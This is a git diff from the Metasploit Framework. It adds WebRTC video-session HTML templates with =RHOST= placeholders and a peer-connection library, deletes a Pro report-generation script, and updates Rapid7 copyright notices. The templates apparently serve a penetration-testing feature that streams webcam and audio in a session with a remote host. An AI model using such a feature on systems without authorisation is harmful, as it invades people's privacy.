var video = document.createElement('video');
|
||||||
|
video.src = URL.createObjectURL(stream);
|
||||||
|
|
||||||
|
peer.onStreamAdded({
|
||||||
|
mediaElement: video,
|
||||||
|
userid: 'self',
|
||||||
|
stream: stream
|
||||||
|
});
|
||||||
|
|
||||||
|
callback(stream);
|
||||||
|
});
|
||||||
|
}
|
||||||
|
</script>
|
||||||
|
</head>
|
||||||
|
<body>
|
||||||
|
|
||||||
|
<div class="container">
|
||||||
|
<div class="windowa" id="windowa">
|
||||||
|
</div>
|
||||||
|
<div class="windowb" id="windowb">
|
||||||
|
</div>
|
||||||
|
<div class="windowc">
|
||||||
|
<b>Session status (=RHOST=):</b><p></p>
|
||||||
|
<span id="message"></span>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
<div class="footer">
|
||||||
|
<center><a href="http://metasploit.com/" target="_blank">metasploit.com</a></center>
|
||||||
|
</div>
|
||||||
|
</body>
|
||||||
|
</html>
|
|
@ -0,0 +1,363 @@
|
||||||
|
// Muaz Khan - https://github.com/muaz-khan
|
||||||
|
// MIT License - https://www.webrtc-experiment.com/licence/
|
||||||
|
// Documentation - https://github.com/muaz-khan/WebRTC-Experiment/tree/master/websocket
|
||||||
|
|
||||||
|
(function () {
|
||||||
|
|
||||||
|
window.PeerConnection = function (socketURL, userid) {
|
||||||
|
this.userid = userid || getToken();
|
||||||
|
this.peers = {};
|
||||||
|
|
||||||
|
if (!socketURL) throw 'Socket-URL is mandatory.';
|
||||||
|
|
||||||
|
new Signaler(this, socketURL);
|
||||||
|
|
||||||
|
this.addStream = function(stream) {
|
||||||
|
this.MediaStream = stream;
|
||||||
|
};
|
||||||
|
};
|
||||||
|
|
||||||
|
function Signaler(root, socketURL) {
|
||||||
|
var self = this;
|
||||||
|
|
||||||
|
root.startBroadcasting = function () {
|
||||||
|
if(!root.MediaStream) throw 'Offerer must have media stream.';
|
||||||
|
|
||||||
|
(function transmit() {
|
||||||
|
socket.send({
|
||||||
|
userid: root.userid,
|
||||||
|
broadcasting: true
|
||||||
|
});
|
||||||
|
!self.participantFound &&
|
||||||
|
!self.stopBroadcasting &&
|
||||||
|
setTimeout(transmit, 3000);
|
||||||
|
})();
|
||||||
|
};
|
||||||
|
|
||||||
|
root.sendParticipationRequest = function (userid) {
|
||||||
|
socket.send({
|
||||||
|
participationRequest: true,
|
||||||
|
userid: root.userid,
|
||||||
|
to: userid
|
||||||
|
});
|
||||||
|
};
|
||||||
|
|
||||||
|
// if someone shared SDP
|
||||||
|
this.onsdp = function (message) {
|
||||||
|
var sdp = message.sdp;
|
||||||
|
|
||||||
|
if (sdp.type == 'offer') {
|
||||||
|
root.peers[message.userid] = Answer.createAnswer(merge(options, {
|
||||||
|
MediaStream: root.MediaStream,
|
||||||
|
sdp: sdp
|
||||||
|
}));
|
||||||
|
}
|
||||||
|
|
||||||
|
if (sdp.type == 'answer') {
|
||||||
|
root.peers[message.userid].setRemoteDescription(sdp);
|
||||||
|
}
|
||||||
|
};
|
||||||
|
|
||||||
|
root.acceptRequest = function (userid) {
|
||||||
|
root.peers[userid] = Offer.createOffer(merge(options, {
|
||||||
|
MediaStream: root.MediaStream
|
||||||
|
}));
|
||||||
|
};
|
||||||
|
|
||||||
|
var candidates = [];
|
||||||
|
// if someone shared ICE
|
||||||
|
this.onice = function (message) {
|
||||||
|
var peer = root.peers[message.userid];
|
||||||
|
if (peer) {
|
||||||
|
peer.addIceCandidate(message.candidate);
|
||||||
|
for (var i = 0; i < candidates.length; i++) {
|
||||||
|
peer.addIceCandidate(candidates[i]);
|
||||||
|
}
|
||||||
|
candidates = [];
|
||||||
|
} else candidates.push(candidates);
|
||||||
|
};
|
||||||
|
|
||||||
|
// it is passed over Offer/Answer objects for reusability
|
||||||
|
var options = {
|
||||||
|
onsdp: function (sdp) {
|
||||||
|
socket.send({
|
||||||
|
userid: root.userid,
|
||||||
|
sdp: sdp,
|
||||||
|
to: root.participant
|
||||||
|
});
|
||||||
|
},
|
||||||
|
onicecandidate: function (candidate) {
|
||||||
|
socket.send({
|
||||||
|
userid: root.userid,
|
||||||
|
candidate: candidate,
|
||||||
|
to: root.participant
|
||||||
|
});
|
||||||
|
},
|
||||||
|
onStreamAdded: function (stream) {
|
||||||
|
console.debug('onStreamAdded', '>>>>>>', stream);
|
||||||
|
|
||||||
|
stream.onended = function () {
|
||||||
|
if (root.onStreamEnded) root.onStreamEnded(streamObject);
|
||||||
|
};
|
||||||
|
|
||||||
|
var mediaElement = document.createElement('video');
|
||||||
|
mediaElement.id = root.participant;
|
||||||
|
mediaElement[isFirefox ? 'mozSrcObject' : 'src'] = isFirefox ? stream : window.webkitURL.createObjectURL(stream);
|
||||||
|
mediaElement.autoplay = true;
|
||||||
|
mediaElement.controls = true;
|
||||||
|
mediaElement.play();
|
||||||
|
|
||||||
|
var streamObject = {
|
||||||
|
mediaElement: mediaElement,
|
||||||
|
stream: stream,
|
||||||
|
userid: root.participant,
|
||||||
|
type: 'remote'
|
||||||
|
};
|
||||||
|
|
||||||
|
function afterRemoteStreamStartedFlowing() {
|
||||||
|
if (!root.onStreamAdded) return;
|
||||||
|
root.onStreamAdded(streamObject);
|
||||||
|
}
|
||||||
|
|
||||||
|
afterRemoteStreamStartedFlowing();
|
||||||
|
}
|
||||||
|
};
|
||||||
|
|
||||||
|
function closePeerConnections() {
|
||||||
|
self.stopBroadcasting = true;
|
||||||
|
if (root.MediaStream) root.MediaStream.stop();
|
||||||
|
|
||||||
|
for (var userid in root.peers) {
|
||||||
|
root.peers[userid].peer.close();
|
||||||
|
}
|
||||||
|
root.peers = {};
|
||||||
|
}
|
||||||
|
|
||||||
|
root.close = function () {
|
||||||
|
socket.send({
|
||||||
|
userLeft: true,
|
||||||
|
userid: root.userid,
|
||||||
|
to: root.participant
|
||||||
|
});
|
||||||
|
closePeerConnections();
|
||||||
|
};
|
||||||
|
|
||||||
|
window.onbeforeunload = function () {
|
||||||
|
root.close();
|
||||||
|
};
|
||||||
|
|
||||||
|
window.onkeyup = function (e) {
|
||||||
|
if (e.keyCode == 116)
|
||||||
|
root.close();
|
||||||
|
};
|
||||||
|
|
||||||
|
function onmessage(e) {
|
||||||
|
var message = JSON.parse(e.data);
|
||||||
|
|
||||||
|
if (message.userid == root.userid) return;
|
||||||
|
root.participant = message.userid;
|
||||||
|
|
||||||
|
// for pretty logging
|
||||||
|
console.debug(JSON.stringify(message, function (key, value) {
|
||||||
|
if (value && value.sdp) {
|
||||||
|
console.log(value.sdp.type, '---', value.sdp.sdp);
|
||||||
|
return '';
|
||||||
|
} else return value;
|
||||||
|
}, '---'));
|
||||||
|
|
||||||
|
// if someone shared SDP
|
||||||
|
if (message.sdp && message.to == root.userid) {
|
||||||
|
self.onsdp(message);
|
||||||
|
}
|
||||||
|
|
||||||
|
// if someone shared ICE
|
||||||
|
if (message.candidate && message.to == root.userid) {
|
||||||
|
self.onice(message);
|
||||||
|
}
|
||||||
|
|
||||||
|
// if someone sent participation request
|
||||||
|
if (message.participationRequest && message.to == root.userid) {
|
||||||
|
self.participantFound = true;
|
||||||
|
|
||||||
|
if (root.onParticipationRequest) {
|
||||||
|
root.onParticipationRequest(message.userid);
|
||||||
|
} else root.acceptRequest(message.userid);
|
||||||
|
}
|
||||||
|
|
||||||
|
// if someone is broadcasting himself!
|
||||||
|
if (message.broadcasting && root.onUserFound) {
|
||||||
|
root.onUserFound(message.userid);
|
||||||
|
}
|
||||||
|
|
||||||
|
if (message.userLeft && message.to == root.userid) {
|
||||||
|
closePeerConnections();
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
var socket = socketURL;
|
||||||
|
if(typeof socketURL == 'string') {
|
||||||
|
socket = new WebSocket(socketURL);
|
||||||
|
socket.push = socket.send;
|
||||||
|
socket.send = function (data) {
|
||||||
|
socket.push(JSON.stringify(data));
|
||||||
|
};
|
||||||
|
|
||||||
|
socket.onopen = function () {
|
||||||
|
console.log('websocket connection opened.');
|
||||||
|
};
|
||||||
|
}
|
||||||
|
socket.onmessage = onmessage;
|
||||||
|
}
|
||||||
|
|
||||||
|
var RTCPeerConnection = window.mozRTCPeerConnection || window.webkitRTCPeerConnection;
|
||||||
|
var RTCSessionDescription = window.mozRTCSessionDescription || window.RTCSessionDescription;
|
||||||
|
var RTCIceCandidate = window.mozRTCIceCandidate || window.RTCIceCandidate;
|
||||||
|
|
||||||
|
navigator.getUserMedia = navigator.mozGetUserMedia || navigator.webkitGetUserMedia;
|
||||||
|
window.URL = window.webkitURL || window.URL;
|
||||||
|
|
||||||
|
var isFirefox = !!navigator.mozGetUserMedia;
|
||||||
|
var isChrome = !!navigator.webkitGetUserMedia;
|
||||||
|
|
||||||
|
var STUN = {
|
||||||
|
url: isChrome ? 'stun:stun.l.google.com:19302' : 'stun:23.21.150.121'
|
||||||
|
};
|
||||||
|
|
||||||
|
var TURN = {
|
||||||
|
url: 'turn:homeo@turn.bistri.com:80',
|
||||||
|
credential: 'homeo'
|
||||||
|
};
|
||||||
|
|
||||||
|
var iceServers = {
|
||||||
|
iceServers: [STUN]
|
||||||
|
};
|
||||||
|
|
||||||
|
if (isChrome) {
|
||||||
|
if (parseInt(navigator.userAgent.match(/Chrom(e|ium)\/([0-9]+)\./)[2]) >= 28)
|
||||||
|
TURN = {
|
||||||
|
url: 'turn:turn.bistri.com:80',
|
||||||
|
credential: 'homeo',
|
||||||
|
username: 'homeo'
|
||||||
|
};
|
||||||
|
|
||||||
|
iceServers.iceServers = [STUN, TURN];
|
||||||
|
}
|
||||||
|
|
||||||
|
var optionalArgument = {
|
||||||
|
optional: [{
|
||||||
|
DtlsSrtpKeyAgreement: true
|
||||||
|
}]
|
||||||
|
};
|
||||||
|
|
||||||
|
var offerAnswerConstraints = {
|
||||||
|
optional: [],
|
||||||
|
mandatory: {
|
||||||
|
OfferToReceiveAudio: true,
|
||||||
|
OfferToReceiveVideo: true
|
||||||
|
}
|
||||||
|
};
|
||||||
|
|
||||||
|
function getToken() {
|
||||||
|
return Math.round(Math.random() * 9999999999) + 9999999999;
|
||||||
|
}
|
||||||
|
|
||||||
|
function onSdpError() {}
|
||||||
|
|
||||||
|
// var offer = Offer.createOffer(config);
|
||||||
|
// offer.setRemoteDescription(sdp);
|
||||||
|
// offer.addIceCandidate(candidate);
|
||||||
|
var Offer = {
|
||||||
|
createOffer: function (config) {
|
||||||
|
var peer = new RTCPeerConnection(iceServers, optionalArgument);
|
||||||
|
|
||||||
|
if (config.MediaStream) peer.addStream(config.MediaStream);
|
||||||
|
peer.onaddstream = function (event) {
|
||||||
|
config.onStreamAdded(event.stream);
|
||||||
|
};
|
||||||
|
|
||||||
|
peer.onicecandidate = function (event) {
|
||||||
|
if (event.candidate)
|
||||||
|
config.onicecandidate(event.candidate);
|
||||||
|
};
|
||||||
|
|
||||||
|
peer.createOffer(function (sdp) {
|
||||||
|
peer.setLocalDescription(sdp);
|
||||||
|
config.onsdp(sdp);
|
||||||
|
}, onSdpError, offerAnswerConstraints);
|
||||||
|
|
||||||
|
this.peer = peer;
|
||||||
|
|
||||||
|
return this;
|
||||||
|
},
|
||||||
|
setRemoteDescription: function (sdp) {
|
||||||
|
this.peer.setRemoteDescription(new RTCSessionDescription(sdp));
|
||||||
|
},
|
||||||
|
addIceCandidate: function (candidate) {
|
||||||
|
this.peer.addIceCandidate(new RTCIceCandidate({
|
||||||
|
sdpMLineIndex: candidate.sdpMLineIndex,
|
||||||
|
candidate: candidate.candidate
|
||||||
|
}));
|
||||||
|
}
|
||||||
|
};
|
||||||
|
|
||||||
|
// var answer = Answer.createAnswer(config);
|
||||||
|
// answer.setRemoteDescription(sdp);
|
||||||
|
// answer.addIceCandidate(candidate);
|
||||||
|
var Answer = {
|
||||||
|
createAnswer: function (config) {
|
||||||
|
var peer = new RTCPeerConnection(iceServers, optionalArgument);
|
||||||
|
|
||||||
|
if (config.MediaStream) peer.addStream(config.MediaStream);
|
||||||
|
peer.onaddstream = function (event) {
|
||||||
|
config.onStreamAdded(event.stream);
|
||||||
|
};
|
||||||
|
|
||||||
|
peer.onicecandidate = function (event) {
|
||||||
|
if (event.candidate)
|
||||||
|
config.onicecandidate(event.candidate);
|
||||||
|
};
|
||||||
|
|
||||||
|
peer.setRemoteDescription(new RTCSessionDescription(config.sdp));
|
||||||
|
peer.createAnswer(function (sdp) {
|
||||||
|
peer.setLocalDescription(sdp);
|
||||||
|
config.onsdp(sdp);
|
||||||
|
}, onSdpError, offerAnswerConstraints);
|
||||||
|
|
||||||
|
this.peer = peer;
|
||||||
|
|
||||||
|
return this;
|
||||||
|
},
|
||||||
|
addIceCandidate: function (candidate) {
|
||||||
|
this.peer.addIceCandidate(new RTCIceCandidate({
|
||||||
|
sdpMLineIndex: candidate.sdpMLineIndex,
|
||||||
|
candidate: candidate.candidate
|
||||||
|
}));
|
||||||
|
}
|
||||||
|
};
|
||||||
|
|
||||||
|
function merge(mergein, mergeto) {
|
||||||
|
for (var t in mergeto) {
|
||||||
|
mergein[t] = mergeto[t];
|
||||||
|
}
|
||||||
|
return mergein;
|
||||||
|
}
|
||||||
|
|
||||||
|
window.URL = window.webkitURL || window.URL;
|
||||||
|
navigator.getMedia = navigator.webkitGetUserMedia || navigator.mozGetUserMedia;
|
||||||
|
navigator.getUserMedia = function(hints, onsuccess, onfailure) {
|
||||||
|
if(!hints) hints = {audio:true,video:true};
|
||||||
|
if(!onsuccess) throw 'Second argument is mandatory. navigator.getUserMedia(hints,onsuccess,onfailure)';
|
||||||
|
|
||||||
|
navigator.getMedia(hints, _onsuccess, _onfailure);
|
||||||
|
|
||||||
|
function _onsuccess(stream) {
|
||||||
|
onsuccess(stream);
|
||||||
|
}
|
||||||
|
|
||||||
|
function _onfailure(e) {
|
||||||
|
if(onfailure) onfailure(e);
|
||||||
|
else throw Error('getUserMedia failed: ' + JSON.stringify(e, null, '\t'));
|
||||||
|
}
|
||||||
|
};
|
||||||
|
|
||||||
|
})();
|
|
@ -0,0 +1,195 @@
|
||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<title>Video session</title>
|
||||||
|
<style type="text/css">
|
||||||
|
div.dot1 {
|
||||||
|
position: absolute;
|
||||||
|
width: 20px;
|
||||||
|
height: 20px;
|
||||||
|
margin: 30px auto 0;
|
||||||
|
border-radius: 50px;
|
||||||
|
background-color: red;
|
||||||
|
top: 150;
|
||||||
|
left: 470;
|
||||||
|
}
|
||||||
|
|
||||||
|
div.dot2 {
|
||||||
|
position: absolute;
|
||||||
|
width: 20px;
|
||||||
|
height: 20px;
|
||||||
|
margin: 30px auto 0;
|
||||||
|
border-radius: 50px;
|
||||||
|
background-color: red;
|
||||||
|
top: 150;
|
||||||
|
left: 505;
|
||||||
|
}
|
||||||
|
|
||||||
|
div.dot3 {
|
||||||
|
position: absolute;
|
||||||
|
width: 20px;
|
||||||
|
height: 20px;
|
||||||
|
margin: 30px auto 0;
|
||||||
|
border-radius: 50px;
|
||||||
|
background-color: red;
|
||||||
|
top: 150;
|
||||||
|
left: 540;
|
||||||
|
}
|
||||||
|
|
||||||
|
div.windowa {
|
||||||
|
height: 340px;
|
||||||
|
width: 420px;
|
||||||
|
border-radius: 15px;
|
||||||
|
-moz-border-raidus: 15px;
|
||||||
|
background-color: black;
|
||||||
|
position: absolute;
|
||||||
|
left: 20;
|
||||||
|
padding : 10px;
|
||||||
|
margin-left: auto;
|
||||||
|
margin-right: auto;
|
||||||
|
text-align: center;
|
||||||
|
vertical-align: middle;
|
||||||
|
color: white;
|
||||||
|
}
|
||||||
|
|
||||||
|
div.windowb {
|
||||||
|
height: 340px;
|
||||||
|
width: 420px;
|
||||||
|
border-radius: 15px;
|
||||||
|
-moz-border-raidus: 15px;
|
||||||
|
background-color: black;
|
||||||
|
position: absolute;
|
||||||
|
left: 570;
|
||||||
|
padding : 10px;
|
||||||
|
margin-left: auto;
|
||||||
|
margin-right: auto;
|
||||||
|
text-align: center;
|
||||||
|
vertical-align: middle;
|
||||||
|
color: white;
|
||||||
|
}
|
||||||
|
|
||||||
|
div.windowc {
|
||||||
|
position: absolute;
|
||||||
|
top: 400;
|
||||||
|
left: 60;
|
||||||
|
height: 50px;
|
||||||
|
width: 900px;
|
||||||
|
color: red;
|
||||||
|
}
|
||||||
|
|
||||||
|
div.footer {
|
||||||
|
position: fixed;
|
||||||
|
bottom: 0;
|
||||||
|
width: 100%;
|
||||||
|
padding: 10px;
|
||||||
|
}
|
||||||
|
</style>
|
||||||
|
|
||||||
|
<script src="api.js"> </script>
|
||||||
|
<script>
|
||||||
|
var channel = '=CHANNEL=';
|
||||||
|
var websocket = new WebSocket('ws://=SERVER=');
|
||||||
|
|
||||||
|
websocket.onopen = function() {
|
||||||
|
websocket.push(JSON.stringify({
|
||||||
|
open: true,
|
||||||
|
channel: channel
|
||||||
|
}));
|
||||||
|
};
|
||||||
|
|
||||||
|
websocket.push = websocket.send;
|
||||||
|
websocket.send = function(data) {
|
||||||
|
websocket.push(JSON.stringify({
|
||||||
|
data: data,
|
||||||
|
channel: channel
|
||||||
|
}));
|
||||||
|
};
|
||||||
|
|
||||||
|
var peer = new PeerConnection(websocket, '=OFFERERID=');
|
||||||
|
|
||||||
|
peer.onStreamAdded = function(e) {
|
||||||
|
var video = e.mediaElement;
|
||||||
|
video.setAttribute('width', 420);
|
||||||
|
video.setAttribute('height', 340);
|
||||||
|
video.setAttribute('controls', false);
|
||||||
|
video.volume = 0.5;
|
||||||
|
|
||||||
|
if (e.userid == 'self') {
|
||||||
|
document.getElementById("windowb").appendChild(video);
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
document.getElementById("windowa").appendChild(video);
|
||||||
|
document.getElementById("message").innerHTML = "Session is now active.";
|
||||||
|
}
|
||||||
|
|
||||||
|
video.play();
|
||||||
|
};
|
||||||
|
|
||||||
|
peer.onStreamEnded = function(e) {
|
||||||
|
var video = e.mediaElement;
|
||||||
|
if (video) {
|
||||||
|
video.style.opacity = 0;
|
||||||
|
setTimeout(function() {
|
||||||
|
video.parentNode.removeChild(video);
|
||||||
|
}, 1000);
|
||||||
|
}
|
||||||
|
document.getElementById("message").innerHTML = "The video session has ended.";
|
||||||
|
};
|
||||||
|
|
||||||
|
window.onload = function() {
|
||||||
|
getUserMedia(function(stream) {
|
||||||
|
peer.addStream(stream);
|
||||||
|
peer.startBroadcasting();
|
||||||
|
});
|
||||||
|
};
|
||||||
|
|
||||||
|
function getUserMedia(callback) {
|
||||||
|
var hints = {audio:true,video:{
|
||||||
|
optional: [],
|
||||||
|
mandatory: {
|
||||||
|
minWidth: 1280,
|
||||||
|
minHeight: 720,
|
||||||
|
maxWidth: 1920,
|
||||||
|
maxHeight: 1080,
|
||||||
|
minAspectRatio: 1.77
|
||||||
|
}
|
||||||
|
}};
|
||||||
|
|
||||||
|
navigator.getUserMedia(hints,function(stream) {
|
||||||
|
var video = document.createElement('video');
|
||||||
|
video.src = URL.createObjectURL(stream);
|
||||||
|
peer.onStreamAdded({
|
||||||
|
mediaElement: video,
|
||||||
|
userid: 'self',
|
||||||
|
stream: stream
|
||||||
|
});
|
||||||
|
|
||||||
|
callback(stream);
|
||||||
|
});
|
||||||
|
}
|
||||||
|
</script>
|
||||||
|
</head>
|
||||||
|
<body>
|
||||||
|
|
||||||
|
<div class="windowa" id="windowa">
|
||||||
|
<b>You peer</b>
|
||||||
|
</div>
|
||||||
|
|
||||||
|
<div class="dot1"></div>
|
||||||
|
<div class="dot2"></div>
|
||||||
|
<div class="dot3"></div>
|
||||||
|
|
||||||
|
<div class="windowb" id="windowb">
|
||||||
|
<b>You</b>
|
||||||
|
</div>
|
||||||
|
|
||||||
|
<div class="windowc">
|
||||||
|
<b>Status:</b><p></p>
|
||||||
|
<span id="message">Waiting for your peer to join the video session...</span>
|
||||||
|
</div>
|
||||||
|
|
||||||
|
<div class="footer">
|
||||||
|
<center><a href="http://metasploit.com/" target="_blank">metasploit.com</a></center>
|
||||||
|
</div>
|
||||||
|
|
||||||
|
</body>
|
||||||
|
</html>
|
|
@ -1,126 +0,0 @@
|
||||||
#!/usr/bin/env ruby
|
|
||||||
|
|
||||||
require 'rubygems'
|
|
||||||
require 'optparse'
|
|
||||||
require 'msfrpc-client'
|
|
||||||
require 'rex/ui'
|
|
||||||
|
|
||||||
def usage(ropts)
|
|
||||||
$stderr.puts ropts
|
|
||||||
|
|
||||||
if @rpc and @rpc.token
|
|
||||||
wspaces = @rpc.call("pro.workspaces") rescue {}
|
|
||||||
if wspaces.keys.length > 0
|
|
||||||
$stderr.puts "Active Projects:"
|
|
||||||
wspaces.each_pair do |k,v|
|
|
||||||
$stderr.puts "\t#{k}"
|
|
||||||
end
|
|
||||||
end
|
|
||||||
end
|
|
||||||
$stderr.puts ""
|
|
||||||
exit(1)
|
|
||||||
end
|
|
||||||
|
|
||||||
opts = {
|
|
||||||
:format => 'PDF'
|
|
||||||
}
|
|
||||||
|
|
||||||
parser = Msf::RPC::Client.option_parser(opts)
|
|
||||||
|
|
||||||
parser.separator('Report Options:')
|
|
||||||
parser.on("--format FORMAT") do |v|
|
|
||||||
opts[:format] = v.upcase
|
|
||||||
end
|
|
||||||
|
|
||||||
parser.on("--project PROJECT") do |v|
|
|
||||||
opts[:project] = v
|
|
||||||
end
|
|
||||||
|
|
||||||
parser.on("--output OUTFILE") do |v|
|
|
||||||
opts[:output] = v
|
|
||||||
end
|
|
||||||
|
|
||||||
parser.on("--help") do
|
|
||||||
$stderr.puts parser
|
|
||||||
exit(1)
|
|
||||||
end
|
|
||||||
parser.separator('')
|
|
||||||
|
|
||||||
parser.parse!(ARGV)
|
|
||||||
@rpc = Msf::RPC::Client.new(opts)
|
|
||||||
|
|
||||||
if not @rpc.token
|
|
||||||
$stderr.puts "Error: Invalid RPC server options specified"
|
|
||||||
$stderr.puts parser
|
|
||||||
exit(1)
|
|
||||||
end
|
|
||||||
|
|
||||||
project = opts[:project] || usage(parser)
|
|
||||||
fname = opts[:output] || usage(parser)
|
|
||||||
rtype = opts[:format]
|
|
||||||
user = @rpc.call("pro.default_admin_user")['username']
|
|
||||||
|
|
||||||
task = @rpc.call("pro.start_report", {
|
|
||||||
'DS_WHITELIST_HOSTS' => "",
|
|
||||||
'DS_BLACKLIST_HOSTS' => "",
|
|
||||||
'workspace' => project,
|
|
||||||
'username' => user,
|
|
||||||
'DS_MaskPasswords' => false,
|
|
||||||
'DS_IncludeTaskLog' => false,
|
|
||||||
'DS_JasperDisplaySession' => true,
|
|
||||||
'DS_JasperDisplayCharts' => true,
|
|
||||||
'DS_LootExcludeScreenshots' => false,
|
|
||||||
'DS_LootExcludePasswords' => false,
|
|
||||||
'DS_JasperTemplate' => "msfxv3.jrxml",
|
|
||||||
'DS_REPORT_TYPE' => rtype.upcase,
|
|
||||||
'DS_UseJasper' => true,
|
|
||||||
'DS_UseCustomReporting' => true,
|
|
||||||
'DS_JasperProductName' => "Metasploit Pro",
|
|
||||||
'DS_JasperDbEnv' => "production",
|
|
||||||
'DS_JasperLogo' => '',
|
|
||||||
'DS_JasperDisplaySections' => "1,2,3,4,5,6,7,8",
|
|
||||||
'DS_EnablePCIReport' => true,
|
|
||||||
'DS_EnableFISMAReport' => true,
|
|
||||||
'DS_JasperDisplayWeb' => true,
|
|
||||||
})
|
|
||||||
|
|
||||||
|
|
||||||
if not task['task_id']
|
|
||||||
$stderr.puts "[-] Error generating the report: #{task.inspect}"
|
|
||||||
exit(0)
|
|
||||||
end
|
|
||||||
|
|
||||||
puts "[*] Report is generating with Task ID #{task['task_id']}..."
|
|
||||||
while true
|
|
||||||
select(nil, nil, nil, 0.50)
|
|
||||||
stat = @rpc.call("pro.task_status", task['task_id'])
|
|
||||||
if stat['status'] == 'invalid'
|
|
||||||
$stderr.puts "[-] Error checking task status"
|
|
||||||
exit(0)
|
|
||||||
end
|
|
||||||
|
|
||||||
info = stat[ task['task_id'] ]
|
|
||||||
|
|
||||||
if not info
|
|
||||||
$stderr.puts "[-] Error finding the task"
|
|
||||||
exit(0)
|
|
||||||
end
|
|
||||||
|
|
||||||
if info['status'] == "error"
|
|
||||||
$stderr.puts "[-] Error generating report: #{info['error']}"
|
|
||||||
exit(0)
|
|
||||||
end
|
|
||||||
|
|
||||||
break if info['progress'] == 100
|
|
||||||
end
|
|
||||||
|
|
||||||
report = @rpc.call('pro.report_download_by_task', task['task_id'])
|
|
||||||
if report and report['data']
|
|
||||||
::File.open(fname, "wb") do |fd|
|
|
||||||
fd.write(report['data'])
|
|
||||||
end
|
|
||||||
$stderr.puts "[-] Report saved to #{::File.expand_path(fname)}"
|
|
||||||
else
|
|
||||||
$stderr.puts "[-] Error downloading report: #{report.inspect}"
|
|
||||||
end
|
|
||||||
|
|
|
@ -878,7 +878,7 @@ The Metasploit Framework is distributed under the modified-BSD license defined b
|
||||||
|
|
||||||
{\footnotesize
|
{\footnotesize
|
||||||
\begin{verbatim}
|
\begin{verbatim}
|
||||||
Copyright (c) 2008, Rapid7 LLC
|
Copyright (c) 2008, Rapid7, Inc.
|
||||||
All rights reserved.
|
All rights reserved.
|
||||||
|
|
||||||
Redistribution and use in source and binary forms, with or without modification,
|
Redistribution and use in source and binary forms, with or without modification,
|
||||||
|
@ -891,7 +891,7 @@ are permitted provided that the following conditions are met:
|
||||||
this list of conditions and the following disclaimer in the documentation
|
this list of conditions and the following disclaimer in the documentation
|
||||||
and/or other materials provided with the distribution.
|
and/or other materials provided with the distribution.
|
||||||
|
|
||||||
* Neither the name of Rapid7 LLC nor the names of its contributors
|
* Neither the name of Rapid7, Inc. nor the names of its contributors
|
||||||
may be used to endorse or promote products derived from this software
|
may be used to endorse or promote products derived from this software
|
||||||
without specific prior written permission.
|
without specific prior written permission.
|
||||||
|
|
||||||
|
|
|
@ -1,6 +1,6 @@
|
||||||
/*
|
/*
|
||||||
ruby-kissfft: a simple ruby module embedding the Kiss FFT library
|
ruby-kissfft: a simple ruby module embedding the Kiss FFT library
|
||||||
Copyright (C) 2009-2010 Rapid7 LLC - H D Moore <hdm[at]metasploit.com>
|
Copyright (C) 2009-2010 Rapid7, Inc - H D Moore <hdm[at]metasploit.com>
|
||||||
|
|
||||||
Derived from "psdpng.c" from the KissFFT tools directory
|
Derived from "psdpng.c" from the KissFFT tools directory
|
||||||
Copyright (C) 2003-2006 Mark Borgerding
|
Copyright (C) 2003-2006 Mark Borgerding
|
||||||
|
|
|
@ -33,7 +33,7 @@
|
||||||
*/
|
*/
|
||||||
|
|
||||||
/*
|
/*
|
||||||
All ruby-lorcon/rubyisms are by Rapid7 LLC (C) 2006-2007
|
All ruby-lorcon/rubyisms are by Rapid7, Inc (C) 2006-2007
|
||||||
http://metasploit.com/ - msfdev[at]metasploit.com
|
http://metasploit.com/ - msfdev[at]metasploit.com
|
||||||
*/
|
*/
|
||||||
|
|
||||||
|
|
|
@ -37,7 +37,7 @@
|
||||||
*/
|
*/
|
||||||
|
|
||||||
/*
|
/*
|
||||||
All ruby-lorcon/rubyisms are by Metasploit LLC (C) 2006-2007
|
All ruby-lorcon/rubyisms are by Rapid7, Inc. (C) 2006-2007
|
||||||
http://metasploit.com/ - msfdev[at]metasploit.com
|
http://metasploit.com/ - msfdev[at]metasploit.com
|
||||||
*/
|
*/
|
||||||
|
|
||||||
|
|
|
@ -1,4 +1,4 @@
|
||||||
/* DLLHijackAuditKit (C) 2010 Rapid7 LLC */
|
/* DLLHijackAuditKit (C) 2010 Rapid7, Inc */
|
||||||
|
|
||||||
var oFso = new ActiveXObject("Scripting.FileSystemObject");
|
var oFso = new ActiveXObject("Scripting.FileSystemObject");
|
||||||
var oShl = new ActiveXObject("WScript.Shell");
|
var oShl = new ActiveXObject("WScript.Shell");
|
||||||
|
|
|
@ -1,4 +1,4 @@
|
||||||
/* DLLHijackAuditKit (C) 2010 Rapid7 LLC */
|
/* DLLHijackAuditKit (C) 2010 Rapid7, Inc */
|
||||||
|
|
||||||
function print_status(msg) {
|
function print_status(msg) {
|
||||||
try {
|
try {
|
||||||
|
|
|
@ -8,46 +8,6 @@
|
||||||
#include <windows.h>
|
#include <windows.h>
|
||||||
#include <WinIOCtl.h>
|
#include <WinIOCtl.h>
|
||||||
|
|
||||||
/*************************************************************************************************/
|
|
||||||
/*************************************************************************************************/
|
|
||||||
/*************************************************************************************************/
|
|
||||||
|
|
||||||
std::wstring CError::Format( DWORD ErrorCode )
|
|
||||||
{
|
|
||||||
return Format( ErrorCode, NULL, NULL );
|
|
||||||
}
|
|
||||||
|
|
||||||
std::wstring CError::Format(DWORD ErrorCode, const TCHAR *Title, const TCHAR *API)
|
|
||||||
{
|
|
||||||
LPVOID lpvMessageBuffer;
|
|
||||||
|
|
||||||
FormatMessage(
|
|
||||||
FORMAT_MESSAGE_ALLOCATE_BUFFER|FORMAT_MESSAGE_FROM_SYSTEM,
|
|
||||||
NULL, ErrorCode,
|
|
||||||
MAKELANGID(LANG_ENGLISH, SUBLANG_DEFAULT),
|
|
||||||
(LPTSTR)&lpvMessageBuffer, 0, NULL);
|
|
||||||
|
|
||||||
std::wstring result;
|
|
||||||
|
|
||||||
std::wostringstream es(TEXT(""));
|
|
||||||
es << ErrorCode;
|
|
||||||
|
|
||||||
if ( Title )
|
|
||||||
{ result.append( Title ); result.append( TEXT("\n") ); }
|
|
||||||
else
|
|
||||||
{ result.append( TEXT("ERROR") ); result.append( TEXT("\n") ); }
|
|
||||||
|
|
||||||
if ( API )
|
|
||||||
{ result.append( TEXT("API = ") );result.append( API ); result.append( TEXT("\n") ); }
|
|
||||||
result.append( TEXT("error code = ") );result.append( es.str() );result.append( TEXT("\n") );
|
|
||||||
if( lpvMessageBuffer )
|
|
||||||
